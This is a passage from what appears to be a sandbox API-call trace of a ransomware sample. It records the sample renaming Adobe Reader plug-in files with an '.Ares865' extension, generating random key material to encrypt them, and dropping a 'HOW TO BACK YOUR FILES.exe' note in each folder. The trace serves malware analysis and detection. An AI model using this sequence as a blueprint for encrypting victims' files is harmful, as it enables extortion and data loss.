10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUM\\Flash.RUM.Ares865") returned 93 [0172.826] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUM\\Flash.RUM" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_rum\\flash.rum"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUM\\Flash.RUM.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_rum\\flash.rum.ares865"), dwFlags=0x1) returned 1 [0172.827] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUM\\Flash.RUM.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_rum\\flash.rum.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0172.828] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0172.828] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0172.828] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0172.829] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.836] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0172.837] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0172.837] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.837] lstrcpyW (in: lpString1=0x2cce498, lpString2="MCIMPP.RUM" | out: lpString1="MCIMPP.RUM") returned="MCIMPP.RUM" [0172.837] lstrlenW (lpString="MCIMPP.RUM") returned 10 [0172.837] lstrlenW (lpString="Ares865") returned 7 [0172.838] lstrcmpiW (lpString1="MPP.RUM", lpString2="Ares865") returned 1 [0172.838] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUM\\MCIMPP.RUM.Ares865") returned 94 [0172.838] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUM\\MCIMPP.RUM" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_rum\\mcimpp.rum"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUM\\MCIMPP.RUM.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_rum\\mcimpp.rum.ares865"), dwFlags=0x1) returned 1 [0172.840] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUM\\MCIMPP.RUM.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_rum\\mcimpp.rum.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0172.840] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8192) returned 1 [0172.840] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0172.841] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0172.841] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.843] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0172.844] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0172.844] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.845] lstrcpyW (in: lpString1=0x2cce498, lpString2="QuickTime.RUM" | out: lpString1="QuickTime.RUM") returned="QuickTime.RUM" [0172.845] lstrlenW (lpString="QuickTime.RUM") returned 13 [0172.845] lstrlenW (lpString="Ares865") returned 7 [0172.845] lstrcmpiW (lpString1="ime.RUM", lpString2="Ares865") returned 1 [0172.845] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUM\\QuickTime.RUM.Ares865") returned 97 [0172.845] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUM\\QuickTime.RUM" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_rum\\quicktime.rum"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUM\\QuickTime.RUM.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_rum\\quicktime.rum.ares865"), dwFlags=0x1) returned 1 [0172.847] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUM\\QuickTime.RUM.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_rum\\quicktime.rum.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0172.847] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0172.847] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0172.848] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0172.848] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.852] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0172.853] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0172.853] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.853] lstrcpyW (in: lpString1=0x2cce498, lpString2="WindowsMedia.RUM" | out: lpString1="WindowsMedia.RUM") returned="WindowsMedia.RUM" [0172.854] lstrlenW (lpString="WindowsMedia.RUM") returned 16 [0172.854] lstrlenW (lpString="Ares865") returned 7 [0172.854] lstrcmpiW (lpString1="dia.RUM", lpString2="Ares865") returned 1 [0172.854] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUM\\WindowsMedia.RUM.Ares865") returned 100 [0172.854] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUM\\WindowsMedia.RUM" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_rum\\windowsmedia.rum"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUM\\WindowsMedia.RUM.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_rum\\windowsmedia.rum.ares865"), dwFlags=0x1) returned 1 [0172.865] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUM\\WindowsMedia.RUM.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_rum\\windowsmedia.rum.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0172.865] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0172.867] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0172.868] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0172.868] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.871] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0172.871] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0172.871] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.872] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_POL", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_POL") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_POL" [0172.872] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_POL" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_POL") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_POL" [0172.872] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0172.872] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_POL\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_pol\\how to back your files.exe"), bFailIfExists=1) returned 0 [0172.873] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0172.874] GetLastError () returned 0x0 [0172.874] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0172.874] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_POL\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d82ddc0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54921460, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54921460, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0172.874] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0172.874] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0172.875] lstrcpyW (in: lpString1=0x2cce498, lpString2="Flash.POL" | out: lpString1="Flash.POL") returned="Flash.POL" [0172.875] lstrlenW (lpString="Flash.POL") returned 9 [0172.875] lstrlenW (lpString="Ares865") returned 7 [0172.875] lstrcmpiW (lpString1="ash.POL", lpString2="Ares865") returned 1 [0172.875] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_POL\\Flash.POL.Ares865") returned 93 [0172.875] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_POL\\Flash.POL" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_pol\\flash.pol"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_POL\\Flash.POL.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_pol\\flash.pol.ares865"), dwFlags=0x1) returned 1 [0172.877] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_POL\\Flash.POL.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_pol\\flash.pol.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0172.877] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0172.878] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0172.878] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0172.878] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.881] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0172.882] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0172.882] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.882] lstrcpyW (in: lpString1=0x2cce498, lpString2="Mcimpp.POL" | out: lpString1="Mcimpp.POL") returned="Mcimpp.POL" [0172.882] lstrlenW (lpString="Mcimpp.POL") returned 10 [0172.882] lstrlenW (lpString="Ares865") returned 7 [0172.882] lstrcmpiW (lpString1="mpp.POL", lpString2="Ares865") returned 1 [0172.883] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_POL\\Mcimpp.POL.Ares865") returned 94 [0172.883] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_POL\\Mcimpp.POL" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_pol\\mcimpp.pol"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_POL\\Mcimpp.POL.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_pol\\mcimpp.pol.ares865"), dwFlags=0x1) returned 1 [0172.885] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_POL\\Mcimpp.POL.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_pol\\mcimpp.pol.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0172.885] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8192) returned 1 [0172.885] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0172.886] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0172.886] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.889] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0172.889] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0172.889] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.890] lstrcpyW (in: lpString1=0x2cce498, lpString2="QuickTime.POL" | out: lpString1="QuickTime.POL") returned="QuickTime.POL" [0172.890] lstrlenW (lpString="QuickTime.POL") returned 13 [0172.890] lstrlenW (lpString="Ares865") returned 7 [0172.890] lstrcmpiW (lpString1="ime.POL", lpString2="Ares865") returned 1 [0172.891] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_POL\\QuickTime.POL.Ares865") returned 97 [0172.891] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_POL\\QuickTime.POL" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_pol\\quicktime.pol"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_POL\\QuickTime.POL.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_pol\\quicktime.pol.ares865"), dwFlags=0x1) returned 1 [0172.893] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_POL\\QuickTime.POL.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_pol\\quicktime.pol.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0172.893] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0172.893] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0172.894] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0172.894] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.896] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0172.896] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0172.896] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.897] lstrcpyW (in: lpString1=0x2cce498, lpString2="WindowsMedia.POL" | out: lpString1="WindowsMedia.POL") returned="WindowsMedia.POL" [0172.897] lstrlenW (lpString="WindowsMedia.POL") returned 16 [0172.897] lstrlenW (lpString="Ares865") returned 7 [0172.897] lstrcmpiW (lpString1="dia.POL", lpString2="Ares865") returned 1 [0172.897] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_POL\\WindowsMedia.POL.Ares865") returned 100 [0172.897] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_POL\\WindowsMedia.POL" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_pol\\windowsmedia.pol"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_POL\\WindowsMedia.POL.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_pol\\windowsmedia.pol.ares865"), dwFlags=0x1) returned 1 [0172.899] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_POL\\WindowsMedia.POL.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_pol\\windowsmedia.pol.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0172.899] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0172.899] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0172.900] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0172.900] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.902] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0172.903] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0172.903] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.903] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HUN", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HUN") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HUN" [0172.904] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HUN" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HUN") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HUN" [0172.904] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0172.904] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HUN\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_hun\\how to back your files.exe"), bFailIfExists=1) returned 0 [0172.905] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0172.905] GetLastError () returned 0x0 [0172.906] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0172.906] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HUN\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d82ddc0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54921460, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54921460, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0172.906] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0172.906] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0172.906] lstrcpyW (in: lpString1=0x2cce498, lpString2="Flash.HUN" | out: lpString1="Flash.HUN") returned="Flash.HUN" [0172.906] lstrlenW (lpString="Flash.HUN") returned 9 [0172.906] lstrlenW (lpString="Ares865") returned 7 [0172.906] lstrcmpiW (lpString1="ash.HUN", lpString2="Ares865") returned 1 [0172.907] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HUN\\Flash.HUN.Ares865") returned 93 [0172.907] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HUN\\Flash.HUN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_hun\\flash.hun"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HUN\\Flash.HUN.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_hun\\flash.hun.ares865"), dwFlags=0x1) returned 1 [0172.908] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HUN\\Flash.HUN.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_hun\\flash.hun.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0172.908] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0172.909] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0172.909] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0172.909] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.912] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0172.912] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0172.912] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.913] lstrcpyW (in: 